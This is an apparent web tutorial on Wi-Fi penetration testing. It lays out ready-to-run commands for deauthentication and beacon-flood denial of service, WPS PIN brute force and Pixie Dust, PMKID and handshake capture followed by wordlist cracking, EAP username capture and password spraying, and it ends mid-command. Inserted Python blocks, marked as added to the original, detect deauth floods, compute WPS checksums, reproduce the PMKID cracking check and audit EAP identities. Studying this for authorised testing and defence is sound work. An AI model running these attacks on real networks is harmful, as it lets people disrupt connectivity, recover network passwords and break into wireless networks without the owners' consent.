Pentesting of Wi-Fi networks. From the basics to advanced attacks

14 March 2024 28 minutes Author: Cyber Witcher

This material is a comprehensive guide to Wi-Fi security testing, detailing various aspects and techniques pentesters can use to identify vulnerabilities in Wi-Fi networks.

Basic Wi-Fi commands

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill interfering processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4 GHz)
airodump-ng wlan0mon --band a #Scan 5 GHz
iwconfig wlan0 mode monitor #Put the interface in monitor mode
iwconfig wlan0mon mode managed #Leave monitor mode - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available Wi-Fi networks

Tools

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
./kali-setup

Airgeddon

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Run airgeddon using docker

docker run \
          --rm \
          -ti \
          --name airgeddon \
          --net=host \
          --privileged \
          -p 3000:3000 \
          -v /tmp:/io \
          -e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
          v1s1t0r1sh3r3/airgeddon

Source: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

It can perform Evil Twin, KARMA, and Known Beacons attacks and then use a phishing pattern to obtain a real network password or intercept social network credentials.

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

This tool automates WPS/WEP/WPA-PSK attacks. It automatically:

  • Switches the interface to monitor mode

  • Scans for possible networks and lets you choose the victim(s)

  • If WEP: launches WEP attacks

  • If WPA-PSK:

      • If WPS: Pixie Dust attack and brute-force attack (be careful, the brute-force attack can take a long time). Note that it does not try the null PIN or database-generated PINs.

      • Tries to capture the PMKID from the AP in order to crack it

      • Tries to deauthenticate the AP's clients to capture the handshake

      • If a PMKID or handshake was captured, tries to brute-force it using the top 5000 passwords.

Summary of attacks

DoS

  • Deauthentication/disassociation – disconnect all clients (or a specific ESSID/client)

  • Random fake access points – hide networks, possibly crash scanners

  • Overload the AP – try to kill the AP (usually not very useful)

  • WIDS – play with the IDS

  • TKIP, EAPOL – some attacks specific to DoS of certain access points

Cracking

  • Crack WEP (several tools and methods)

  • Crack WPA-PSK: WPS PIN “brute-force”, WPA PMKID brute-force, [DoS +] WPA handshake capture + cracking

WPA-MGT

  • Username capture

  • Brute-force credentials

Evil Twin (with or without DoS)

  • Open Evil Twin [+ DoS] – Useful for capturing portal credentials and/or performing attacks over a local network

  • WPA-PSK Evil Twin – Useful for network attacks if you know the password

  • WPA-MGT – useful for obtaining company credentials

DOS

Deauthentication packets

Deauthentication attacks, a common Wi-Fi hacking method, involve forging management frames to force devices to disconnect from the network. These unencrypted packets trick clients into believing they come from the legitimate network, allowing attackers to collect WPA handshakes for cracking or to persistently disrupt network connections. This tactic, disturbing in its simplicity, is widely used and has significant implications for network security.

Deauthentication with Aireplay-ng

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

  • -0 means deauthentication

  • 1 is the number of deauths to send (you can send several if you want); 0 means send them continuously

  • -a 00:14:6C:7E:40:80 is the MAC address of the access point

  • -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if omitted, broadcast deauthentication is sent (doesn’t always work)

  • ath0 is the name of the interface

Disassociation packets

Disassociation packets, like deauthentication packets, are a type of management frame used in Wi-Fi networks. These packets serve to break the connection between a device (such as a laptop or smartphone) and an access point (AP). The main difference between disassociation and deauthentication is in their usage scenarios. While an access point issues deauthentication packets to explicitly remove rogue devices from the network, disassociation packets are typically sent when the access point is shutting down, restarting or relocating, requiring all connected nodes to disconnect.

This attack can be performed using mdk4 (“d” mode):

# -c <channel>
# -b victim_client_mac.txt contains the MAC addresses of the devices to kick off
# -E WifiName is the name of the Wi-Fi network
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters are optional: you could give only the ESSID and mdk4 will automatically search for it, wait to find clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F
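The defensive counterpart to the deauthentication and disassociation attacks above, as an added example that is not part of the original article: a minimal parser for the fixed 802.11 management-frame header and a per-BSSID sliding-window counter that flags floods of deauth/disassoc frames. It assumes raw 802.11 frames with any radiotap header already stripped; all MAC addresses, timestamps and frames are constructed.

```python
"""Detect deauthentication/disassociation floods in raw 802.11 frames.

Added example, not from the original article: a minimal parser for the fixed
802.11 management-frame header and a per-BSSID sliding-window counter.
Frames are assumed to be raw 802.11 (radiotap header already stripped);
every MAC address and frame below is constructed, not captured.
"""
import struct
from collections import defaultdict, deque

SUBTYPE_DISASSOC = 0x0A   # management subtype 10
SUBTYPE_DEAUTH = 0x0C     # management subtype 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(frame: bytes):
    """Return the header fields of a management frame, or None otherwise."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    version, ftype, subtype = fc0 & 0x03, (fc0 >> 2) & 0x03, fc0 >> 4
    if version != 0 or ftype != 0:       # type 0 = management frame
        return None
    seq_ctl = struct.unpack_from("<H", frame, 22)[0]
    info = {
        "subtype": subtype,
        "da": _mac(frame[4:10]),         # receiver address
        "sa": _mac(frame[10:16]),        # transmitter address
        "bssid": _mac(frame[16:22]),
        "seq": seq_ctl >> 4,             # 12-bit sequence number
        "reason": None,
    }
    # deauth/disassoc bodies start with a 2-byte little-endian reason code
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def detect_deauth_flood(frames, window=5.0, threshold=10):
    """frames: iterable of (timestamp_seconds, raw_frame) in time order.

    Emits one alert per BSSID the first time `threshold` deauth/disassoc
    frames are seen within `window` seconds; returns the list of alerts.
    """
    recent = defaultdict(deque)          # bssid -> timestamps in the window
    alerted, alerts = set(), []
    for ts, raw in frames:
        hdr = parse_mgmt_frame(raw)
        if hdr is None or hdr["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        q = recent[hdr["bssid"]]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and hdr["bssid"] not in alerted:
            alerted.add(hdr["bssid"])
            alerts.append({
                "bssid": hdr["bssid"],
                "count": len(q),
                "broadcast": hdr["da"] == BROADCAST,   # aimed at every client?
                "reason": hdr["reason"],
                "first_seen": q[0],
                "last_seen": ts,
            })
    return alerts


# ---- constructed sample input (not a real capture) ------------------------
def build_frame(da, sa, bssid, seq, reason=7, subtype=SUBTYPE_DEAUTH):
    """Build a raw deauth/disassoc frame: FC, duration, 3 addresses, seq, reason."""
    mac = lambda s: bytes(int(x, 16) for x in s.split(":"))
    fc0 = subtype << 4                    # type 0 (management), version 0
    return (struct.pack("<BBH", fc0, 0, 0x013A) + mac(da) + mac(sa) + mac(bssid)
            + struct.pack("<H", seq << 4) + struct.pack("<H", reason))


AP = "64:20:9f:15:4f:d7"        # BSSID being flooded
OTHER_AP = "6a:fe:3b:73:18:fb"  # BSSID with ordinary traffic

SAMPLE_FRAMES = sorted(
    # 30 broadcast deauths "from" AP inside two seconds: a flood
    [(1000.0 + i * 0.066, build_frame(BROADCAST, AP, AP, seq=i)) for i in range(30)]
    + [
        # one disassociation from a second AP, e.g. a reboot: not a flood
        (1001.0, build_frame("00:0f:b5:34:30:30", OTHER_AP, OTHER_AP, seq=5,
                             reason=3, subtype=SUBTYPE_DISASSOC)),
        # a beacon (subtype 8) that the detector must ignore
        (1001.5, bytes([0x80, 0x00]) + bytes(22) + bytes(12)),
    ],
    key=lambda f: f[0],
)

if __name__ == "__main__":
    for a in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"ALERT bssid={a['bssid']} count={a['count']} "
              f"broadcast={a['broadcast']} reason={a['reason']}")
```

Management Frame Protection (802.11w) is the standard mitigation, since it makes forged deauth/disassoc frames fail integrity checks; rate-based detection like this is the fallback where it is not deployed.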

More DoS attacks with mdk4

ATTACK MODE b: Beacon Flooding

Sends beacon frames to show fake access points to clients. Sometimes this can cause network scanners and even drivers to crash!

# -a Use also non-printable characters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDs
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-of-Service

Sending authentication frames to all available access points (APs) within range can overload these APs, especially when many clients are involved. This heavy traffic can lead to system instability, causing some access points to freeze or even reset.

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and replay packets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing the access point (AP) checks whether the SSID is properly revealed and confirms the AP's range. This technique, combined with bruteforcing hidden SSIDs with or without a wordlist, helps to identify and access hidden networks.

ATTACK MODE m: Michael countermeasures Exploitation

Sending random or duplicate packets to different QoS queues can trigger Michael countermeasures on TKIP access points, causing the access point to shut down for one minute. This method is an effective DoS (Denial of Service) attack tactic.

# -t <BSSID> of a TKIP AP
# -j use intelligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Flooding the access point with EAPOL Start frames creates fake sessions, overloading the access point and blocking legitimate clients. Additionally, injecting fake EAPOL Logoff messages forces clients to disconnect; both methods effectively disrupt the network.

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Attacks for IEEE 802.11s mesh networks

Various attacks on communication control and routing in mesh networks.

ATTACK MODE w: WIDS Confusion

Cross-connecting clients to multiple WDS nodes or fake access points can confuse intrusion detection and prevention systems, creating confusion and the potential for abuse of the system.

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mdk4 wlan0mon w -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

A packet fuzzer with a variety of packet sources and a full set of packet manipulation modifiers.

Airgeddon

Airgeddon offers most of the attacks described above.

WPS

WPS (Wi-Fi Protected Setup) simplifies connecting devices to a router, speeding up and easing setup for networks protected with WPA or WPA2 Personal. It is pointless for WEP security, which is easy to crack anyway. WPS uses an 8-digit PIN that is verified in two halves, which makes it susceptible to brute-force attacks because of the limited number of combinations (11,000 possibilities).

WPS Bruteforce

There are 2 main tools to do this: Reaver and Bully.

  • Reaver was designed as a robust and practical attack against WPS, and has been tested against a wide range of access points and WPS implementations.

  • Bully is a new implementation of the WPS brute force attack written in C. It has several advantages over the original reaver code: fewer dependencies, improved memory and CPU performance, correct handling of byte order, and a more robust parameter set.

The attack exploits a weakness of the WPS PIN: the first four digits are confirmed separately and the last digit is a checksum, which makes brute force practical. However, defenses against brute-force attacks, such as blocking the MAC addresses of aggressive attackers, require MAC address rotation to continue the attack.

By obtaining the WPS PIN using tools such as Bully or Reaver, an attacker can determine the WPA/WPA2 PSK, providing permanent access to the network.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N [-L -d 2] -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
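The PIN arithmetic behind the "11,000 possibilities" above, as an added example that is not part of the original article, Reaver or Bully: the checksum rule from the Wi-Fi Simple Configuration specification (first seven digits weighted 3,1,3,1,... from the right, the eighth digit brings the weighted sum to a multiple of 10), a validator for 8-digit PINs, and the count that shows why confirming each half separately collapses the search space. 12345670 is the specification's well-known example PIN.

```python
"""WPS PIN checksum and the 11,000-guess search space from the text above.

Added example, not from the original article, Reaver or Bully. The checksum
rule is the one from the Wi-Fi Simple Configuration specification: the first
seven digits are weighted 3,1,3,1,... from the right, and the eighth digit
brings the weighted sum to a multiple of 10. The PIN 12345670 is the
specification's well-known example PIN.
"""


def wps_checksum(first7: int) -> int:
    """Return the eighth (check) digit for a 7-digit PIN prefix."""
    acc = 0
    while first7:
        acc += 3 * (first7 % 10)
        first7 //= 10
        acc += first7 % 10
        first7 //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True for an 8-digit PIN whose last digit is the correct checksum."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def complete_pin(first7: str) -> str:
    """Append the checksum digit to a 7-digit prefix."""
    if len(first7) != 7 or not first7.isdigit():
        raise ValueError("need exactly 7 digits")
    return first7 + str(wps_checksum(int(first7)))


def valid_pins_with_first_half(first4: str) -> int:
    """Count the valid PINs that share a given first half (expect 1000:
    three free digits, the fourth fixed by the checksum)."""
    return sum(1 for tail in range(10 ** 4) if is_valid_pin(f"{first4}{tail:04d}"))


def search_space():
    """Why the PIN is brute-forceable.

    The registrar confirms the first half (digits 1-4) on its own before the
    second half is checked, so an attacker needs at most 10**4 guesses for the
    first half and 10**3 for the second (its last digit is the checksum):
    11,000 guesses instead of the 10**7 valid 8-digit PINs that exist.
    Returns (first_half, second_half, total, naive_total).
    """
    first_half, second_half = 10 ** 4, 10 ** 3
    return first_half, second_half, first_half + second_half, 10 ** 7


if __name__ == "__main__":
    print(complete_pin("1234567"), is_valid_pin("12345670"), is_valid_pin("12345671"))
    print(valid_pins_with_first_half("1234"), search_space())
```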

Smart brute force

This advanced approach targets WPS PINs using known vulnerabilities:

  • Pre-discovered PINs: use a database of known PINs associated with specific manufacturers known to use uniform WPS PINs. This database matches the first three octets of MAC addresses with the likely PINs for these manufacturers.

  • PIN generation algorithms: use algorithms like ComputePIN and EasyBox that calculate WPS PINs based on the access point’s MAC address. Arcadyan’s algorithm additionally requires a device ID, adding a layer to the PIN generation process.

WPS Pixie Dust Attack

Dominique Bongard discovered a flaw in the way some access points (APs) generate the secret values known as nonces (E-S1 and E-S2). If these nonces can be determined, cracking the AP’s WPS PIN becomes easy. The AP sends a hash of the PIN to prove that it is legitimate and not a fake (rogue) AP; these nonces are essentially the “keys” to the “safe” that holds the WPS PIN.

Simply put, the problem is that some access points did not use enough random keys to encrypt the PIN during the connection process. This makes the PIN vulnerable to guessing from outside the network (offline brute force attack).

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

Null Pin Attack

Some poorly designed systems even allow access with a null PIN (a blank or non-existent PIN), which is quite unusual. The Reaver tool is able to test for this vulnerability, unlike Bully.

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

All proposed WPS attacks can be easily performed using airgeddon.

  • 5 and 6 allow you to try your own PIN code (if available)

  • 7 and 8 perform a Pixie Dust attack

  • 13 allows you to check for a NULL PIN

  • 11 and 12 will collect the PINs associated with the selected access point from the available databases and generate possible PINs using: ComputePIN, EasyBox and additionally Arcadyan (recommended, why not?)

  • 9 and 10 will check all possible PIN codes

WEP

So broken and unused today. Just be aware that airgeddon has a WEP option called “All in One” to attack this type of security. Other tools offer similar options.

WPA/WPA2 PSK

PMKID

In 2018, hashcat introduced a new attack method that is unique in that it requires only one packet and does not require any clients to connect to the target access point—only interaction between the attacker and the access point.

Many modern routers add an optional field, the Robust Security Network (RSN) information element, to the first EAPOL frame during association. It includes the PMKID.

As explained in the original post, the PMKID is generated using known data:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Given that “PMK Name” is constant, that we know the BSSID of the access point and the station, and that the PMK is identical to the one used in the full 4-way handshake, hashcat can use this information to crack the PSK and recover the passphrase!

To collect this information and verify the password locally, follow these steps:

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcapng -i wlan0mon --enable_status=1
#You can also obtain PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

The captured PMKIDs will be shown on the console and also saved in /tmp/attack.pcapng. Now convert the capture to hashcat/john format and crack it:

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Please note that the format of a valid hash contains 4 parts separated by *, such as:

4017733ca8db33a1479196c2415173be*b808d7b83cfa*a4a6a9a5aae7*566f6461666f6e65436f6e6e6563743034383131343838

If yours contains only 3 parts, it is invalid (the PMKID entry is invalid).
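The PMKID derivation and the 4-part hash format above carried through in code, as an added example that is not part of the original article, hashcat or hcxtools: it computes the PMK from passphrase and ESSID with PBKDF2-HMAC-SHA1 (4096 iterations, 32 bytes, the WPA2-PSK rule), derives the PMKID with the HMAC-SHA1-128 formula, and validates hashcat 16800 lines (PMKID*MAC_AP*MAC_STA*ESSID_hex). Passphrase, ESSID and MACs in the sample are constructed (reused from other parts of this article); the article's own example hash is used only for the format check.

```python
"""PMKID derivation and hashcat 16800 line validation.

Added example, not from the original article, hashcat or hcxtools. It
implements the formula quoted above:
    PMK   = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)
    PMKID = HMAC-SHA1(PMK, "PMK Name" | MAC_AP | MAC_STA)[:16]
and checks the 4-part hashcat 16800 format PMKID*MAC_AP*MAC_STA*ESSID_hex.
Passphrase, ESSID and MACs in the sample are constructed (taken from other
parts of this article); ARTICLE_LINE is the article's own example hash.
"""
import hashlib
import hmac


def _mac_bytes(mac: str) -> bytes:
    """'70:4C:A5:F8:9A:C1', '70-4c-...' or bare hex -> 6 bytes."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """WPA2-PSK: the PMK is PBKDF2-HMAC-SHA1 over passphrase and ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def pmkid(pmk: bytes, mac_ap: str, mac_sta: str) -> bytes:
    """HMAC-SHA1-128: the first 16 bytes of HMAC-SHA1."""
    data = b"PMK Name" + _mac_bytes(mac_ap) + _mac_bytes(mac_sta)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def parse_16800(line: str) -> dict:
    """Split PMKID*MAC_AP*MAC_STA*ESSID_hex; raise ValueError for the
    3-part lines the article warns about or for fields of the wrong size."""
    parts = line.strip().split("*")
    if len(parts) != 4:
        raise ValueError(f"expected 4 fields separated by '*', got {len(parts)}")
    pmkid_hex, ap_hex, sta_hex, essid_hex = parts
    if len(pmkid_hex) != 32 or len(ap_hex) != 12 or len(sta_hex) != 12:
        raise ValueError("PMKID must be 16 bytes and each MAC 6 bytes of hex")
    return {
        "pmkid": bytes.fromhex(pmkid_hex),
        "mac_ap": ap_hex,
        "mac_sta": sta_hex,
        "essid": bytes.fromhex(essid_hex).decode("utf-8", "replace"),
    }


def is_valid_16800(line: str) -> bool:
    try:
        parse_16800(line)
        return True
    except ValueError:
        return False


def check_passphrase(line: str, passphrase: str) -> bool:
    """True when `passphrase` reproduces the PMKID in the hash line, i.e. the
    same comparison hashcat makes for every wordlist candidate."""
    h = parse_16800(line)
    candidate = pmkid(pmk_from_passphrase(passphrase, h["essid"]), h["mac_ap"], h["mac_sta"])
    return hmac.compare_digest(candidate, h["pmkid"])


def make_16800(passphrase: str, essid: str, mac_ap: str, mac_sta: str) -> str:
    """Build a hash line from a known passphrase (how the sample is produced)."""
    pmk = pmk_from_passphrase(passphrase, essid)
    return "*".join([pmkid(pmk, mac_ap, mac_sta).hex(), _mac_bytes(mac_ap).hex(),
                     _mac_bytes(mac_sta).hex(), essid.encode().hex()])


# The article's example hash, with its '*' separators restored.
ARTICLE_LINE = ("4017733ca8db33a1479196c2415173be*b808d7b83cfa*a4a6a9a5aae7*"
                "566f6461666f6e65436f6e6e6563743034383131343838")

if __name__ == "__main__":
    sample = make_16800("mitmwifi123", "MITIWIFI", "70:4C:A5:F8:9A:C1", "00:0F:B5:34:30:30")
    print(sample)
    print(check_passphrase(sample, "mitmwifi123"), check_passphrase(sample, "wrong-pass"))
    print(is_valid_16800(ARTICLE_LINE), parse_16800(ARTICLE_LINE)["essid"])
```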

Note that hcxdumptool will also capture handshakes (something like this will appear: MP:M1M2 RC:63258 EAPOLTIME:17091). You can convert the handshake to hashcat/john format using cap2hccapx:

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx /tmp/att.pcap /tmp/att.hccapx ["Filter_ESSID"]
hccap2john /tmp/att.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

Note that some of the handshakes captured by this tool cannot be cracked even with the correct password. If possible, it is recommended to also capture handshakes the traditional way, or to capture several of them with this tool.

Capturing a handshake

An attack on WPA/WPA2 networks can be performed by capturing the handshake and attempting to crack the password offline. This process involves monitoring a particular network’s BSSID on a particular channel. Here’s a quick guide:

  • Identify the BSSID, channel and a connected client of the target network.

  • Use airodump-ng to monitor network traffic on the specified channel and BSSID, hoping to capture the handshake. The command looks like this:

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

  • To increase the chance of capturing the handshake, disconnect the client from the network to force reauthentication. This can be done with aireplay-ng, which sends deauthentication packets to the client:

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Note that after the client is deauthenticated, it could try to connect to a different access point or, in other cases, to a different network.

When airodump-ng shows the handshake information, the handshake has been captured and you can stop listening.

Once the handshake is captured, you can crack it using aircrack-ng:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

WPA Enterprise (MGT)

In corporate WiFi setups, you’ll come across different authentication methods, each of which provides different levels of security and management features. When you use tools like airodump-ng to inspect network traffic, you may notice identifiers for these authentication types. Common methods include:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

EAP-GTC (Generic Token Card):

  • This method supports hardware tokens and one-time passwords within EAP-PEAP. Unlike MSCHAPv2, it does not use a peer challenge and sends passwords in plain text to the access point, making it vulnerable to downgrade attacks.

EAP-MD5 (Message Digest 5):

  • Involves sending an MD5 hash of the password from the client. It is not recommended because of its vulnerability to dictionary attacks, the lack of server authentication and the inability to generate session-specific WEP keys.

EAP-TLS (Transport Layer Security):

  • Uses both client-side and server-side certificates for authentication and can dynamically generate user- and session-based WEP keys to secure communications.

EAP-TTLS (Tunneled Transport Layer Security):

  • Provides mutual authentication through an encrypted tunnel along with a per-user, per-session method of obtaining dynamic WEP keys. It only requires server-side certificates; clients use credentials.

PEAP (Protected Extensible Authentication Protocol):

  • Functions similarly to EAP-TTLS, creating a TLS tunnel for protected communication. This allows weaker authentication protocols to be used on top of EAP thanks to the protection offered by the tunnel.

  • PEAP-MSCHAPv2: often simply called PEAP, it combines the vulnerable MSCHAPv2 challenge/response mechanism with a protective TLS tunnel.

  • PEAP-EAP-TLS (or PEAP-TLS): similar to EAP-TLS, but initiates a TLS tunnel before exchanging certificates, offering an additional layer of security.

Username capture

From reading https://tools.ietf.org/html/rfc3748#page-27, it seems that if you are using EAP, Identity messages must be supported and the username will be sent in the clear in the “Response Identity” message.

Even with one of the most secure authentication methods, PEAP-EAP-TLS, it is possible to capture the username sent in the EAP protocol. To do this, capture an authentication exchange (start airodump-ng on the channel and Wireshark on the same interface) and filter the packets by eapol. Inside the “Response, Identity” packet, the client’s username will appear.

Anonymous identities

Identity hiding is supported by EAP-PEAP and EAP-TTLS. In the context of a Wi-Fi network, an EAP-Identity request is typically initiated by the access point (AP) during the association process. To preserve user anonymity, the response from the EAP client on the user’s device contains only the information the initial RADIUS server needs to route the request. This concept is illustrated by the following scenarios:

EAP-Identity = anonymous

In this scenario, all users use the alias “anonymous” as their user ID. The originating RADIUS server functions as an EAP-PEAP or EAP-TTLS server, responsible for managing PEAP or TTLS on the server side. The internal (secure) authentication method is then handled locally or delegated to a remote (home) RADIUS server.

EAP-Identity = anonymous@realm_x

In this situation, users from different realms hide their identities while indicating their respective realms. This allows the initial RADIUS server to proxy the EAP-PEAP or EAP-TTLS requests to the RADIUS servers in their home realms, which act as the PEAP or TTLS servers. The initial RADIUS server acts solely as a RADIUS relay node.

Alternatively, the originating RADIUS server can function as an EAP-PEAP or EAP-TTLS server and either handle the secure authentication method or forward it to another server. This option makes it easier to configure separate policies for different domains.

In EAP-PEAP, after establishing a TLS tunnel between the PEAP server and the PEAP client, the PEAP server initiates an EAP-Identity request and transmits it over the TLS tunnel. The client responds to this second EAP-Identity request by sending an EAP-Identity response containing the user’s true identity over the encrypted tunnel. This approach effectively prevents the user’s true identity from being revealed to anyone eavesdropping on 802.11 traffic.

EAP-TTLS follows a slightly different procedure. With EAP-TTLS, the client is typically authenticated using PAP or CHAP secured by a TLS tunnel. In this case, the client includes the User-Name attribute and the Password or CHAP-Password attribute in the initial TLS message sent after the tunnel is established.

Regardless of the chosen protocol, the PEAP/TTLS server learns the user’s true identity after the TLS tunnel is established. The true identity can be represented as user@realm or simply user. If the PEAP/TTLS server is also responsible for authenticating the user, it now possesses the user’s identity and proceeds with the authentication method protected by the TLS tunnel. Alternatively, the PEAP/TTLS server can forward a new RADIUS request to the user’s home RADIUS server. This new RADIUS request omits the PEAP or TTLS protocol layer.

Where the protected authentication method is EAP, the inner EAP messages are sent to the home RADIUS server without the EAP-PEAP or EAP-TTLS wrapper, and the User-Name attribute of the outgoing RADIUS message contains the user’s true identity, replacing the anonymous User-Name from the incoming RADIUS request. Where the protected authentication method is PAP or CHAP (supported only by TTLS), the User-Name and the other authentication attributes extracted from the TLS payload are substituted into the outgoing RADIUS message, replacing the anonymous User-Name and the TTLS EAP-Message attributes found in the incoming RADIUS request.
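A check for the two sections above (usernames sent in the clear, anonymous outer identities), as an added example that is not part of the original article: it parses the EAPOL and EAP headers (IEEE 802.1X and RFC 3748) of frames seen before any TLS tunnel exists and reports outer identities that are not anonymised, so you can verify that your supplicants send anonymous@realm (or @realm) rather than a real username. The sample frames and the realm are constructed, not captured.

```python
"""Audit EAP Response/Identity frames for usernames sent in the clear.

Added example, not from the original article: it parses the EAPOL and EAP
headers (IEEE 802.1X and RFC 3748) of frames seen before any TLS tunnel
exists and reports outer identities that are not anonymised, so you can
check that supplicants send anonymous@realm (or @realm) as described above.
The sample frames and realm are constructed, not captured.
"""
import struct

EAPOL_TYPE_EAP_PACKET = 0   # EAPOL packet type that carries an EAP message
EAP_CODE_RESPONSE = 2
EAP_TYPE_IDENTITY = 1


def parse_eap_identity_response(eapol: bytes):
    """Return the identity string from an EAPOL-encapsulated EAP
    Response/Identity, or None if the frame is anything else."""
    if len(eapol) < 4:
        return None
    _version, ptype, length = struct.unpack_from("!BBH", eapol, 0)
    if ptype != EAPOL_TYPE_EAP_PACKET or length < 5 or len(eapol) < 4 + length:
        return None
    code, _eap_id, eap_len, eap_type = struct.unpack_from("!BBHB", eapol, 4)
    if code != EAP_CODE_RESPONSE or eap_type != EAP_TYPE_IDENTITY or eap_len > length:
        return None
    identity = eapol[9:4 + eap_len]
    # RFC 3748 allows a NUL after the identity followed by display text
    return identity.split(b"\x00", 1)[0].decode("utf-8", "replace")


def is_anonymous_identity(identity: str) -> bool:
    """The outer identity reveals nothing when its user part is empty or
    'anonymous' (RFC 7542 style NAI such as '@realm' or 'anonymous@realm')."""
    user = identity.split("@", 1)[0]
    return user == "" or user.lower() == "anonymous"


def audit(frames):
    """frames: iterable of raw EAPOL payloads (Ethernet/802.11 headers removed).
    Returns [(identity, is_anonymous)] for every Response/Identity found."""
    findings = []
    for frame in frames:
        identity = parse_eap_identity_response(frame)
        if identity is not None:
            findings.append((identity, is_anonymous_identity(identity)))
    return findings


def leaked_usernames(frames):
    """Identities that expose a real username in the clear."""
    return [ident for ident, anon in audit(frames) if not anon]


# ---- constructed sample frames ---------------------------------------------
def build_identity_response(identity: str, eap_id: int = 1) -> bytes:
    """EAPOL(v2, EAP-Packet) wrapping an EAP Response/Identity."""
    body = identity.encode()
    eap = struct.pack("!BBHB", EAP_CODE_RESPONSE, eap_id, 5 + len(body),
                      EAP_TYPE_IDENTITY) + body
    return struct.pack("!BBH", 2, EAPOL_TYPE_EAP_PACKET, len(eap)) + eap


SAMPLE_FRAMES = [
    build_identity_response("anonymous@corp.example"),   # good: realm only
    build_identity_response("jdoe@corp.example"),        # leaks a username
    build_identity_response("@corp.example"),            # good: empty user part
    struct.pack("!BBH", 2, 1, 0),                        # EAPOL-Start: ignored
    struct.pack("!BBH", 2, 0, 5) + struct.pack("!BBHB", 1, 1, 5, 1),  # EAP Request/Identity: ignored
]

if __name__ == "__main__":
    for identity, anon in audit(SAMPLE_FRAMES):
        print(f"{identity:28} {'ok' if anon else 'LEAKS USERNAME'}")
```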

EAP-Bruteforce (password spray)

If the client is expected to use a username and password (note that EAP-TLS will not be valid in this case), then you can try to get a list of usernames (see the section above) and passwords and try to brute-force access using air-hammer:

./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt

You can also perform this attack with eaphammer:

./eaphammer --eap-spray \
    --interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
